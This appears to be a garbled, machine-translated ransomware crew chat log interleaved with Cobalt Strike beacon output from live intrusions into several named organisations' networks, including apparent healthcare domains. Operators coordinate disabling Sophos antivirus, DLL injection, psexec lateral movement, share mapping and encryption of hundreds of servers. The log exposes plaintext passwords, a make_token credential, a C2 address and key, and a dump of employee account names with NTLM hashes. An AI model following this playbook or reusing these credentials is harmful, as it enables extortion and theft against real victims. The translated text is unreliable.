192.168.112.144
192.168.112.153
192.168.112.154
192.168.112.156
192.168.112.157
192.168.112.158
``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or sitting in dead-ends - throw your dllkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDayDay, what grids will work?
user3 will try[ ](https://mediaeveryone.com/group/silencershop-com?msg=CoNfDvPLR9LxZZFG6) and by the way did not pass? user3 Add plz @user3
he'll take it from here. I'll try poking around in the code, maybe you have some? No, I can't find an alternative to SharpPrinter and no other implementations?

Unhandled Exception:
Unhandled Exception: System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)
   at SharpPrinter.Program.SendArpRequest(IPAddress dst)
   at SharpPrinter.Program.<>c__DisplayClass6_0.<ScanPrinters>b__0()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()
System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)

``There must be something in the codeprinters to compile the ehashnik, it doesn't workcitrix no printerscitrixdescription? hell what exactly? gpp empty, hell? What else can I try? No progress so far
no rights up
17-010 empty
xp all ports are closed but pinged
ftp is empty
sql is not online
lockout is zero, ran a storm with passwords found - nothing
no passwords on files and spheres
no kerbs
there is no username anywhere - no password - no kerbs
```
192.168.1.2:445 (platform: 500 version: 10.0 name: SS-DATA2 domain: SilencerShop)
192.168.1.101:445
192.168.1.115:445 (platform: 500 version: 10.0 name: SS-HEATHER domain: SilencerShop)
192.168.1.120:445 (platform: 500 version: 10.0 name: SS-SALES2 domain: SilencerShop)
192.168.1.122:445 (platform: 500 version: 10.0 name: SS-BISCHOFFDESK domain: SilencerShop)
192.168.1.125:445 (platform: 500 version: 10.0 name: DESKTOP-2G463RJ domain: SilencerShop)
192.168.1.126:445 (platform: 500 version: 10.0 name: SS-SALES1 domain: SilencerShop)
192.168.1.133:445 (platform: 500 version: 10.0 name: SS-LMATHENY domain: SilencerShop)
192.168.1.135:445 (platform: 500 version: 10.0 name: NCC-1701 domain: SilencerShop)

[+] received output:
192.168.1.136:445 (platform: 500 version: 10.0 name: SS-SURFACEBOOK2 domain: SilencerShop)
192.168.1.137:445 (platform: 500 version: 10.0 name: SS-AWELLS domain: SilencerShop)
192.168.1.138:445 (platform: 500 version: 10.0 name: SS-BROOKS domain: SilencerShop)
192.168.1.141:445 (platform: 500 version: 10.0 name: SS-MDIONNEJR domain: SilencerShop)
192.168.1.142:445 (platform: 500 version: 10.0 name: DESKTOP-69NK6FB domain: SilencerShop)
192.168.1.144:445 (platform: 500 version: 10.0 name: DESKTOP-T1BM5VF domain: SilencerShop)
192.168.1.147:445 (platform: 500 version: 10.0 name: SS-KBRYMER domain: SilencerShop)
192.168.1.166:445 (platform: 500 version: 10.0 name: SS-KATE domain: SilencerShop)
192.168.1.168:445 (platform: 500 version: 10.0 name: SS-FPTSCAN domain: SilencerShop)
192.168.1.169:445 (platform: 500 version: 10.0 name: SS-MORTEGA domain: SilencerShop)
192.168.1.186:445 (platform: 500 version: 10.0 name: SS-ANDERS domain: SilencerShop)
192.168.1.207:445
192.168.1.214:445 (platform: 500 version: 10.0 name: SS-KCROSS domain: SilencerShop)
``session crashed
win 10 2004 - failed to get up (not LA)
shuffliner is not LA anywhere else
whining is not online
ftp is there but nothing worked
one xp, but all ports are closed
nothing online under 17-010
started scanning sharpPrinter and flew away all the rest what can kerbs no and citrix, kerbs? he is nowhere else lav files also nothing but the password polozakapolzak not la, unlikely to get up there is 1 xp, but all ports are closed all okrch lagging?)123eyJhbGciOiJB5u6ZbGYV29r41QuWH4DIzKoAQoMa1VQZmtiekbMvCl5T/3SZ664XrpB5FO/sXmyhWKRHfsiPFDdyfjbHTUZysL+n2F70jPhuidpkhYsD0WVCpNNyIzMRaSM7Bal5eRGCos/5KnS/Hc3JBQfS/qO4wbVT+65j4x3VDxt3vHkkA3vj3LrFpeFfdgVw32NX/H5RlPuY7+KiPlfc8Ykzjoo8v/3lw/oja97tUPX5QMcdhpJ5mzcbvA4bELSuyOgLiaBmHg/zxgqXxN+8k66lh504nHn1M2yTJyBcZf6XaJhvCxYP+kjJqJjtwwfdJwZslVx6J06doG7XYUXB/Qwbnajldi9arjFdIS2g45H9MS+g7ZKuwmMNA5SOJkg47qTXcBlHhC88uBl/vA7w9caBjqsI/VLghDwksezgGC2/fx4Mgc9bGBi9foi5s2b/FIL90yJICWDtw4XiF/lRcqnq5aB1mNr5dSSAYL8zdFcfWLcOngSB9s5pcOQ1VaWZIYpVnJMZATX3BRoe8wFX9pVS/H0FOR0HxAqZJGEpII06vgYy7mBAkSObNn4DuqnF2Czy3t06PlYsPScgqTTqJwsq7fBOt1iJxqQBwymX1sZGEwKsnQ5jTJKKyEr2XmIIGHfF12TuaZegJOUG+zhrm7rUd9Pstl0092hLpFKR3UN32eUHQs84kDSw1B+23wZ9B9ypIxbcQzII19e/FHPdria2zyyf8q2I0ehELRStysztoB4uylzBRVVUXzA0TVYHHDEfYU4mQglQEEhvTxd2ZTe2kBufQVhyti/R5pqz7/0JS26BL+8XIEfi7JBShw1UDfbrjb4OYVHslmEqVcZmqMoQNIW+0vCi/SrPaCMGRpguVWxH6tIW2g5C0cKdud5HIop9HdOB4VUS+4rM6a8gBaNeWNX4PQD7/AvTjlTyVdXyQR8aEuxJoIQpLI65ioMcMJaHhhe+GmlJshHVicXUr6CCKqXW/Bobksqat7WlAFgN//rDehSMl2RK hang them up, if you see that they recover - finish it = )from here a couple of sessions came with fsrv and dk - the rdmi is1.done.lrhc.org0.done.lrhc.org and on to #genralThat's it, let's wrap it up. enter + 1 additional net[ ](https://mediaeveryone.com/group/lrhc-org?msg=4vFvHrAH6kSgf5ekp) will not come out, no internet so far in difficilepo classics disassemble and workupon give you a cobu where will fly sessions we have a little time to talk about the process that I'm not particularly happy
servers: 5/7 (2 were not attracted)
armas: servers flew away fast, no time to map
Now for the process, let's keep this format for the future
mcklrh.mig

servers: 6/6
Armas: 15 masked, not yet encrypted




ffmg.local

servers: 1/3 (1 did not attract, 1 no kred, not allowed even YES)
armas: not zamapi




ELEAH.LOCAL

servers: 5/7 (2 were not attracted)
Armies: Servers flew away quickly, no time to map




lrhc.local

servers: 171/175 (4 not attracted or mapped, no disks/balls visible)
armas: 791/1040 mapped, cipher in question
´´Well, there are approximate stats not yet? what? contact @ot us router is connecting to the wpn, what's the problem? reboot what? reboot what? @tl1? we have office proxy failed - we cobbed and ready, now we're completing the status what? minutes1 left to get one and a half domains? so what? `ffmg.local\petekuttera e65e7043f9e8c2321284f39e830a51ba`FFMG\Administrator Lexapro421!oxa`mapped to LRHDC02 one and a half domains left to get the scale of the tragedyDescribe the intermediate result10.10.70.5 - mask disks c,d,e on the dk+on the dk, there are still not allowed to do soIs it possible to pull on a blocked server and run the inject on a new one will work? we have several scenarios or shut off AVproblem mapped to another server? does not break his dlk and exeсheck why not block the server `` ``
+] received output:

Host Name: LRH-WDS01
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User

```

```
Name Version
Sophos Network Threat Protection 1.10.1051.0
Sophos Anti-Virus 10.8.9.610
Sophos Endpoint Self Help 3.0.217.0
Sophos AutoUpdate XG 6.6.144.0
Sophos Health 2.4.7.0

AppRecovery Agent 6.4.0.718
Sophos Endpoint Agent 2.0.423.0
Sophos Diagnostic Utility 6.5.238.0
Sophos Endpoint Firewall 1.2.0.17 6.1.1.28093
Sophos File Integrity Monitoring 1.0.1.11

If not, if it's not hanging, then the crypt is going on. Check the pid session, skip the ones that fell off while we're working on it. I'll clarify, the file is the first to fall and the crypt is in the next hour if the file appears but the session is dead?
 Directory of \10.10.30.211$

06/21/2019 10:29 AM 0 CLRtypes.txt
12/21/2020 02:55 AM <DIR> Downloads
12/21/2020 06:00 AM 278 ErrorLog.xml
12/21/2020 02:55 AM <DIR> inetpub
12/21/2020 02:55 AM 849 LABEL_rhollis.txt.PXILP
12/21/2020 02:55 AM <DIR> Logs
06/21/2019 10:22 AM 0 msxml.txt
07/09/2017 10:03 AM <DIR> PerfLogs
12/21/2020 02:55 AM <DIR> Program Files
12/21/2020 02:55 AM <DIR> Program Files (x86)
12/21/2020 02:55 AM <DIR> Quarantine
12/21/2020 02:55 AM 1,495 readme.txt
07/02/2019 01:59 PM 0 TW.txt
07/02/2019 01:59 PM 0 TW2.txt
12/21/2020 05:56 AM <DIR> Users
12/21/2020 05:56 AM <DIR> Windows
               7 File(s) 2,622 bytes
               9 Dir(s) 32,827,768,832 bytes free

``kill the av and bang the ehhe reopen and if not alive? If you forget the sessions after the inject should be alive I have my damamil on topnot see the popo and other things maxima`` ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 195572 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes

``I've opened 3 of the green servers to choose from
marim armaments on it
inject
move on to the next one, someone write down the algorithm that you work out? I do not have a question is relevant I have not finished the last word) where is the logic?
``You guys in my coba have a problem with the massinject?
`
`
Encrypting the servers
`[ ](https://mediaeveryone.com/group/lrhc-org?msg=vnoWXKwqYYFZuN737) [ ](https://mediaeveryone.com/group/lrhc-org?msg=NBDJ4mz4rwxMXPhgm) ``

``Forget the answerI answered you above or I don't understand somethingIs the guys in my coba having problems with the array? ok[ ](https://mediaeveryone.com/group/lrhc-org?msg=oarSXwdaXmqpFuTXS) forgot to put `- )o worked outSafetyIbahe.If he himself doesn't want to mask his drives on another serverIs the guys in my coba what are you doing?
 Volume in drive C is OS
 Volume Serial Number is 584E-4F0A

 Directory of C:\

07/13/2009 09:20 PM <DIR> PerfLogs
02/10/2018 10:06 AM <DIR> Program Files
10/07/2019 08:20 PM <DIR> Program Files (x86)
10/16/2017 10:36 AM <DIR> Quarantine
01/06/2014 02:45 PM <DIR> temp
06/08/2018 07:52 AM <DIR> Users
08/20/2020 08:12 PM <DIR> Windows
               0 File(s) 0 bytes
               7 Dir(s) 50,698,219,520 bytes free

``and give me more dir C:\to try and change the dir+rights of the system?
Host Name: LRHPROFILES2
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-262-0784995-84931
Original Install Date: 5/24/2011, 9:39:37 PM
System Boot Time: 2/13/2020, 9:16:14 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
                           [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 4.096 MB
Available Physical Memory: 2,107 MB
Virtual Memory: Max Size: 8,189 MB
Virtual Memory: Available: 4,599 MB
Virtual Memory: In Use: 3,590 MB
Page File Location(s): C:\pagefile.sys
Domain: lrhc.local
Logon Server: N/A
Hotfix(s): 128 Hotfix(s) Installed.
                           [01]: KB981391
                           [02]: KB981392
                           [03]: KB977236
                           [04]: KB981111
                           [05]: KB977238
                           [06]: KB2764913
                           [07]: KB2764916
                           [08]: KB2718695
                           [09]: KB977239
                           [10]: KB2670838
                           [11]: KB981390
                           [12]: KB2425227
                           [13]: KB2446710
                           [14]: KB2484033
                           [15]: KB2497640
                           [16]: KB2503658
                           [17]: KB2506014
                           [18]: KB2506212
                           [19]: KB2506223
                           [20]: KB2506928
                           [21]: KB2507618
                           [22]: KB2508272
                           [23]: KB2508429
                           [24]: KB2509553
                           [25]: KB2510531
                           [26]: KB2511250
                           [27]: KB2511455
                           [28]: KB2515325
                           [29]: KB2522422
                           [30]: KB2524375
                           [31]: KB2533552
                           [32]: KB2533623
                           [33]: KB2534366
                           [34]: KB2536275
                           [35]: KB2536276
                           [36]: KB2541014
                           [37]: KB2544893
                           [38]: KB2545698
                           [39]: KB2547666
                           [40]: KB2552343
                           [41]: KB2560656
                           [42]: KB2563227
                           [43]: KB2564958
                           [44]: KB2570947
                           [45]: KB2584146
                           [46]: KB2585542
                           [47]: KB2603229
                           [48]: KB2604115
                           [49]: KB2607047
                           [50]: KB2608658
                           [51]: KB2618451
                           [52]: KB2620704
                           [53]: KB2621440
                           [54]: KB2631813
                           [55]: KB2639308
                           [56]: KB2640148
                           [57]: KB2643719
                           [58]: KB2645640
                           [59]: KB2647753
                           [60]: KB2653956
                           [61]: KB2654428
                           [62]: KB2655992
                           [63]: KB2656356
                           [64]: KB2660075
                           [65]: KB2667402
                           [66]: KB2676562
                           [67]: KB2685811
                           [68]: KB2685813
                           [69]: KB2685939
                           [70]: KB2690533
                           [71]: KB2691442
                           [72]: KB26698365
                           [73]: KB2699779
                           [74]: KB2705219
                           [75]: KB2706045
                           [76]: KB2709630
                           [77]: KB2712808
                           [78]: KB2718704
                           [79]: KB2719857
                           [80]: KB2726535
                           [81]: KB2729094
                           [82]: KB2729452
                           [83]: KB2731771
                           [84]: KB2732059
                           [85]: KB2742599
                           [86]: KB2743555
                           [87]: KB2750841
                           [88]: KB2753842
                           [89]: KB2757638
                           [90]: KB2758857
                           [91]: KB2761217
                           [92]: KB2763523
                           [93]: KB2765809
                           [94]: KB2770660
                           [95]: KB2785220
                           [96]: KB2786081
                           [97]: KB2786400
                           [98]: KB2789645
                           [99]: KB2791765
                           [100]: KB2798162
                           [101]: KB2804579
                           [102]: KB2807986
                           [103]: KB2808679
                           [104]: KB2813347
                           [105]: KB2813430
                           [106]: KB2820197
                           [107]: KB2820331
                           [108]: KB2830290
                           [109]: KB2833946
                           [110]: KB2834140
                           [111]: KB2834886
                           [112]: KB2839894
                           [113]: KB2840149
                           [114]: KB2844286
                           [115]: KB2849470
                           [116]: KB2850851
                           [117]: KB2859537
                           [118]: KB2861855
                           [119]: KB2862772
                           [120]: KB2862966
                           [121]: KB2863058
                           [122]: KB2868623
                           [123]: KB2999226
                           [124]: KB3154518
                           [125]: KB4019990
                           [126]: KB4499175
                           [127]: KB976902
                           [128]: KB976932
Network Card(s): 1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled: No
                                 IP address(es).
                                 [01]: 10.10.39.142
                                 [02]: fe80::f9c5:bb23:5d30:3177
``Av offc:\Windows\Temp all off? where did you start it from? ehversion of the oda updated the same nonsense I'm updating the exeshnik version of the Inge?i can't even see it after a while no udmifile null injected normal workwhy is it possible you have 3 more trusts on top and you went minus 40 mins if the coba was cut off more likely already know about you in tempeokm retract, retract and immediately put if you do not use sessions and they knock every 5 sec you imagine what noise you create? if you mapped under token change it and maps should be saved retract ``
10.10.30.173
10.10.30.175
10.10.30.176
10.10.30.177
10.10.30.180
10.10.30.183
10.10.30.196
10.10.30.206
10.10.30.208
10.10.30.210
10.10.30.211
10.10.30.212
10.10.30.222
10.10.30.223
10.10.30.225
10.10.30.226
10.10.30.230
10.10.30.231
10.10.30.244
10.10.30.245
10.10.30.246
10.10.30.247
10.10.30.248
10.10.30.249
10.10.31.70
10.10.37.11
10.10.39.18
10.10.39.40
10.10.39.68
10.10.39.83
10.10.39.85
10.10.39.149
10.10.39.179
10.10.39.180
10.10.39.181
10.10.39.184
10.10.39.186
10.10.39.187
10.10.70.5
169.254.0.2
169.254.0.2
172.23.15.10
you were supposed to be in the trusts for an hour then we're done in the other session, you were kicked out?
beacon> make_token lrhc.local\nmsapps dragon374
[*] Tasked beacon to create a token for lrhc.local\nmsapps
[+] host called home, sent: 46 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
beacon> shell net use * \\10.5.68.221\C$
[*] Tasked beacon to run: net use *\\10.5.68.221\C$
[+] host called home, sent: 57 bytes
beacon> shell net use * \\10.10.222.20\C$
[*] Tasked beacon to run: net use * \\10.10.222.20\C$
[+] host called home, sent: 58 bytes
beacon> shell net use * \\10.5.68.99\C$
[*] Tasked beacon to run: net use *\\\10.5.68.99\C$
[+] host called home, sent: 56 bytes
beacon> shell net use * \\10.91.18.115\C$
[*] Tasked beacon to run: net use *\\\10.91.18.115\C$
[+] host called home, sent: 58 bytes
beacon> shell net use * \\10.5.68.119\C$
[*] Tasked beacon to run: net use *\\\10.5.68.119\C$
[+] host called home, sent: 57 bytes
beacon> shell net use * \\10.10.220.140\C$
[*] Tasked beacon to run: net use *\\10.10.220.140\C$
[+] host called home, sent: 59 bytes
beacon> shell ping 10.10.220.140
[*] Tasked beacon to run: ping 10.10.220.140
[+] host called home, sent: 49 bytes
beacon> shell dir C:\
[*] Tasked beacon to run: dir C:\
[+] host called home, sent: 38 bytes
``Don't touch them, they have my sessions. Take them.
192.254.69.178:25674
VwboHyBv8QTsyelrIDPOEJ2Ee99JlhyiCK4
``Compyping* from the second koba is pinged on all kobas and even trusts? Apparently our koba was cut offSessions is slacking on this server drop everything by hand to put the ehe very interesting OS, process list, edr, available RAMfeedback to the tulchan
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 217711 bytes
[-] relocation truncated to fit (distance between executable code and other data is >4GB)
``then there is a reverse order here, more likely the client itself has not updated the polisy cloud, there is no polisy updatkak and vindef actually did you update it polisy on the clients? sohos is still chopped, although it seems disabledwhy? no, had to armas mapit you already moved to trusts? all pulled up share username=C:/ and if via disk then stop processes and services and unshare them yourself if vmic works) `` ``
beacon> portscan 10.10.30.57 3389
[*] Tasked beacon to scan ports 3389 on 10.10.30.57
[+] host called home, sent: 93405 bytes
[+] received output:
(ICMP) Target '10.10.30.57' is alive. [read 8 bytes]
10.10.30.57:3389
Scanner module is complete
``Check for generalrdp disks?
beacon> jump psexec 10.10.30.57 pipe
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_42) on 10.10.30.57 via Service Control Manager (\\10.10.30.57\ADMIN$\22adc14.exe)
[+] host called home, sent: 287864 bytes
[-] could not upload file: 64
[-] Could not start service 22adc14 on 10.10.30.57: 64
[-] Could not connect to pipe: 64
``bindpipe is fighting? Not even a c$...``
beacon> shell wmic /node:10.10.30.57 share get caption,name,path
[*] Tasked beacon to run: wmic /node:10.10.30.57 share get caption,name,path
[+] host called home, sent: 201 bytes
[+] received output:
No Instance(s) Available.


``or even ѕhare request balls via get share from mikane fs?
lrhppathif.lrhc.local
``What's the host? ``10.10.30.57 is still in process Didn't you already delete the snaps?
beacon> execute-assembly SharpSharesNG.exe shares 10.10.30.57
[*] Tasked beacon to run .NET program: SharpSharesNG.exe shares 10.10.30.57
[+] host called home, sent: 129223 bytes
[+] received output:
******* COMPLETE *******
```
```
beacon> shell wmic /node:10.10.30.57 OS get NAME
[*] Tasked beacon to run: wmic /node:10.10.30.57 OS get NAME
[+] host called home, sent: 185 bytes
[+] received output:
Name

Microsoftr Windows Serverr 2008 Standard |C:\Windows|\Device\Harddisk0\Partition1
``build up with sessions and then where not disconnect or go if there is a possibility to disconnect avs - always better through disconnect avs after serverrr then you can through psec disconnect avs disconnect avs what decided to do? disconnect avs or map? since admin is) well then it makes sense to chop[ ](https://mediaeveryone.com/group/lrhc-org?msg=yD93e8s4vCEPza2mv) was kindaadmin from sofos no? dk in all domains in the last place the biggest network we had at this stage only here in the tone do it all first pull and map then start everywhere elsehowever no 100 pulled and mapped then start 100 in all 4? sofosMap and start immediately?and what is the av by the way7 then map the disks of the server and then run the builddrival pids and services are those responsible for the database or wiem for example because the hold is not taken off the network from busy filesnado chop services and pidservers that are not attractedbuild out then pull servers map the armies so if it flew into the block not to lose all at oncesessions from the first 3 to 1 kobu not pull in the first 3 domains open sessions and prepare accesses YES to work and start with the last because he is the biggesttut classics 1 kobu 100 servers worked from two with this network how many you have only kobu?`ELEAH.LOCAL`
17 servers
541 armies
 
`ffmg.local`
9 servers
237 armies
 
`mcklrh.mig
14 servers
46 armies
 
`lrhc.local`
289 servers
2,638 armas almost half an hour we have not even begun to give status on all domains. how many servers and armas `APOfi98h&T6GHUs(&*fgTWE` I SharpShares rewrote a little, so they scansharfinder? scan subnets from sabinets - looking for where the admin admin
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
ADM/Domain Admins
Administrator
The command completed successfully.

``fucking LOCALGROUP administrators because you screwed up
beacon> shell net group administrators
[*] Tasked beacon to run: net group administrators
[+] host called home, sent: 55 bytes
[+] received output:
This command can be used only on a Windows Domain Controller.

More help is available by typing NET HELPMSG 3515.

``It's strange that la doesn't show...EA doesn't show, LA doesn't showDC``.
 ADMINDC5 10.0.61.13
 ADMINDC1 10.0.61.2
 ADMINDC3 10.0.61.6
 ADMINDC4 10.0.61.7
 ADMINDC2 10.0.61.10
 SPOCK 10.7.51.3
 AZUREDC1 10.221.32.4
``DA``.
administrator ad-script avamar
backup bross CGSUMBUser
ciscowireless citrixdb clusteradmin
id-automation idautosupport installsvcs
kaceinstaller ldelar mandl
mherna02 munis munis2
munis3 mzuvan nsuser
odomin papercut pgalde
philipldap SAM sccmadmin
sccmagent sccmsvc sisdservice
sqlfc support tylerdfs
tylerservice tylersisbackup umra-admin
vdivmm webadmin
``net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 30
Maximum password age (days): 999
Minimum password length: 6
Length of password history maintained: 3
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
The command completed successfully.
``Good job, good job,``
[DC] 'mcklrh.mig' will be the domain
[DC] 'raddc02.mcklrh.mig' will be the DC server
[DC] Exporting domain 'mcklrh.mig'
1001 SUPPORT_388945a0 6f033587ef18aa7281931967f8260e1015 66050
1616 nelson 2d7f1a5a61d3a96fb5159b5eef17adc6 514
1612 tech fbc52e18292b500a3b5a1982e19360d0 514
1151 test2 56ad694bdd191d54b6a49fc7e51d611c 514
1155 test4 28bb5d82dfe78e456c9a4f7c588c8727a 514
1168 t_winacc 71b43a8306d1bb60e84a0bc2400a5a21 512
1204 draugdahl 71b43a8306d1bb60e84a0bc2400a5a21 512
1225 drpearson 71b43a8306d1bb60e84a0bc2400a5a21 512
1229 drschmidt 71b43a8306d1bb60e84a0bc2400a5a21 512
1231 drtraiser 71b43a8306d1bb60e84a0bc2400a5a21 512
1239 mgblaplante 71b43a8306d1bb60e84a0bc2400a5a21 512
1244 drbusian 71b43a8306d1bb60e84a0bc2400a5a21 512
1247 drhenry 71b43a8306d1bb60e84a0bc2400a5a21 512
1249 drmcfarlane 71b43a8306d1bb60e84a0bc2400a5a21 512
1252 drstephens 71b43a8306d1bb60e84a0bc2400a5a21 512
1685 jastokfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1689 jdricksn 71b43a8306d1bb60e84a0bc2400a5a21 512
1680 drwernecke f648163703e6c08e66e778c9fcf1c695 512
1256 dmandemu 71b43a8306d1bb60e84a0bc2400a5a21 512
1699 tmtomhmu 71b43a8306d1bb60e84a0bc2400a5a21 512
1701 r_rollhs 71b43a8306d1bb60e84a0bc2400a5a21 512
1716 jjgreged 71b43a8306d1bb60e84a0bc2400a5a21 512
1717 rliverfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1258 V_vanwsn 71b43a8306d1bb60e84a0bc2400a5a21 512
1262 amandamarthaler 71b43a8306d1bb60e84a0bc2400a5a21 512
1263 amysievert 71b43a8306d1bb60e84a0bc2400a5a21 512
1266 annetteellingson 71b43a8306d1bb60e84a0bc2400a5a21 512
1274 debschneider 71b43a8306d1bb60e84a0bc2400a5a21 512
1279 hollythompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1281 jerimitchell 71b43a8306d1bb60e84a0bc2400a5a21 512
1283 jillbrethorst 71b43a8306d1bb60e84a0bc2400a5a21 512
1288 kathithompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1289 katrinajohnson 71b43a8306d1bb60e84a0bc2400a5a21 512
1294 margaretmoore 71b43a8306d1bb60e84a0bc2400a5a21 512
1295 marilynewan 71b43a8306d1bb60e84a0bc2400a5a21 512
1296 maryfredrickson 71b43a8306d1bb60e84a0bc2400a5a21 512
1306 sherrimaanum 71b43a8306d1bb60e84a0bc2400a5a21 512
1307 sonyakelly 71b43a8306d1bb60e84a0bc2400a5a21 512
1314 vickirode e813a6c841263e9cf4127f2eb34f7cda 512
1318 glstabsn 71b43a8306d1bb60e84a0bc2400a5a21 512
1319 lanerrfp 71b43a8306d1bb60e84a0bc2400a5a21 512
1320 sjnelson 71b43a8306d1bb60e84a0bc2400a5a21 512
1248 drkobriger 81b11bc140d8511fea3f1a627bc5069d 512
1112 calibrate 7e4026687ad6be0a6d736f1fabc8bc16 66048
1718 njolson 45a3cb98d159490c48e9add320b2754a 512
1260 betseypetersen 5af6ca259ee8bf3f44ec14900435a0a2 512
1195 cgtysver fa7d5249b9eaee7735cd74b7621d3c7f 512
1729 c_grafrc 71b43a8306d1bb60e84a0bc2400a5a21 512
1730 njjohnson e813a6c841263e9cf4127f2eb34f7cda 512
1735 tadebrito 71b43a8306d1bb60e84a0bc2400a5a21 512
1737 jwachlarowicz 71b43a8306d1bb60e84a0bc2400a5a21 512
1739 drkimoffice 71b43a8306d1bb60e84a0bc2400a5a21 512
1652 plwiczek 718cbf401001bbfd8fedda9dc078af6 512
1713 jmlien d76c4dbb99f9fe336e7634cfc0fd5d7b 512
1723 jjongeward 656e2f0fb9f108bb7008d5e6e57ac973 512
1329 dnheskin 71b43a8306d1bb60e84a0bc2400a5a21 512
1733 ckmaucrc 11c256333da14053ffb516f84c7876c4 512
1726 j_blonrc 2bd91c2112b3895a356dc850d6ed1acd 512
1700 ndhellhs ba7cabf4467a8145d97d787dd386d888 512
1224 drona 006c00f6d6e35bdc75c69989060399c2 512
1741 drsell c7bad7d1cc2f3c69adea5ccb429234ad 512
1719 swancma 82cd2c655e2f5c0d096181faa5d9c54e 512
1172 nyhukjmu 789cc4b71ce5c2391956ac1df34ddd93 512
1673 edmgr 4b6d381d8bf53c5be1620293ceccacf3 512
1709 mahansed 9d79f63d8560fc299e5daeb07f0bccdf 512
1191 kjswanson 71b43a8306d1bb60e84a0bc2400a5a21 514
1760 h_billor 71b43a8306d1bb60e84a0bc2400a5a21 512
1728 mabakker 3fed67f37553c237ba0e3506ab7722d1 512
1334 patriciatell 71b43a8306d1bb60e84a0bc2400a5a21 514
1683 sdkroged 2bd09797bbcd1cb0c56b800b99b374fe8 512
1326 drovervold 71b43a8306d1bb60e84a0bc2400a5a21 512
1336 aefrank 71b43a8306d1bb60e84a0bc2400a5a21 512
1338 neflinck 71b43a8306d1bb60e84a0bc2400a5a21 512
1341 kjthompson 71b43a8306d1bb60e84a0bc2400a5a21 512
1342 hmanderson 71b43a8306d1bb60e84a0bc2400a5a21 512
1345 tanyaconroy 71b43a8306d1bb60e84a0bc2400a5a21 512
1347 debthom 71b43a8306d1bb60e84a0bc2400a5a21 512
1768 kimborgus 71b43a8306d1bb60e84a0bc2400a5a21 514
1724 drludwig 6db862a3e5993ea3245de09f7c560d5f 512
1714 uhlialed c1d60fccbdc09924681b9cf859ad1eeb 512
1740 drwoolner c36e58e7931f4dfbf68dd4e583ec39b1 512
1770 seedwafp 71b43a8306d1bb60e84a0bc2400a5a21 512
1771 banelson 71b43a8306d1bb60e84a0bc2400a5a21 512
1772 mwbabcock 71b43a8306d1bb60e84a0bc2400a5a21 512
1267 barbarabecker 014631dff7c5641f56b1264ce44b9e86 512
1677 n_saxed 5f998160d5a5c5771cbba046f9ecb191 512
1357 bjwasved 71b43a8306d1bb60e84a0bc2400a5a21 512
1276 dianeskistad b0d18851aaddc665883a0c2fc3eb1f95 512
1346 theresakallstrom 71b43a8306d1bb60e84a0bc2400a5a21 512
1653 rlswanson f08eaf4b67a44f9db354e7c0b6fc5437 512
1687 lmlundfp 85dd1a8770bd756de08b696064775da3 512
1192 lcundssu 71b43a8306d1bb60e84a0bc2400a5a21 512
1766 drvanderhagen 555f7cd2e083212e14b921c6d6eafff1 512
1360 petersm 612dcf80df63db5bd313d16e235e7e37 512
1774 holewam 3f1e1f48a52790b07fc8f7f78fd1896d 512
1674 ksgilbed 31d05994bf7883f4d452dd8a9f1f54 512
1780 kimkugler 71b43a8306d1bb60e84a0bc2400a5a21 512
1781 megangriep 71b43a8306d1bb60e84a0bc2400a5a21 512
1779 nelssjcs b7496bd41da213cb86be83810f061dde 512
1366 dremokpae 71b43a8306d1bb60e84a0bc2400a5a21 512
1353 katyrisbrudt 5f0f6c0018275d54e5678ab259164984 512
1328 dsniklrc 71b43a8306d1bb60e84a0bc2400a5a21 514
1210 drhaeberlin 71b43a8306d1bb60e84a0bc2400a5a21 514
